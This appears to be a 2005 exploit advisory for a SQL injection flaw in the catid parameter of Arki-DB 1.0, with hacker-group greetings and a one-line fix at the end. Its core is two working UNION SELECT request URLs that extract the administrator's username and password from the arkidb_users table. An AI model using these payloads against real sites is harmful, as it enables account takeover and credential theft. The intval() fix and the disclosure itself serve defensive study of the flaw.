Arki-DB 1.0 (catid) Remote SQL Injection Vulnerabilities
2005-11-14 00:00:00[~] ArkiDB SQL Injection's [~]
[~] ArkiDB (catid) Ramote SQL Injection's
[~] ---------------------- [~]
[~] Bug By Devil-00
[~] [email protected]
[~]
[~] Whe Ar All Love Security4Arab For Ever [ S4a.cc ]
[~] -------------------------------------------------
[~]
[~] Explorer Exploit By Devil-00
[~] -------------------------------------------------
[~] Greetz :-
[~] Devil-00
[~] www.s4a.cc << We Love You
[~] www.securitygurus.net << Love you 2 :P
[~] HACKERS PAL - ABDUCTER - Xion - Yes2Hack - Ja7ole - Magode .. All S4a And SG Members
[~]---------------------------------------------------------------------------------------------------------
[~] Explorer Exploit :-
[~]
[~] [Username]
[~] /index.php?action=view&view=category&catid=-1%20UNION%20SELECT%20null,null,username,null,null,null,null,null%20FROM%20arkidb_users%20WHERE%20id=1&catflag=1&sublevel=1
[~]
[~] [Password]
[~] /index.php?action=view&view=category&catid=-1%20UNION%20SELECT%20null,null,userpass,null,null,null,null,null%20FROM%20arkidb_users%20WHERE%20id=1&catflag=1&sublevel=1
[~]----------------------------------------------------------------------------------------------------------
[~] FIX :-
[~] Line 75 .. File /source/view.php
[~]
[~] $catid = $this->get('catid');
[~] Change To
[~] $catid = intval($this->get('catid'));
[~]----------------------------------------------------------------------------------------------------------
[~]
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.

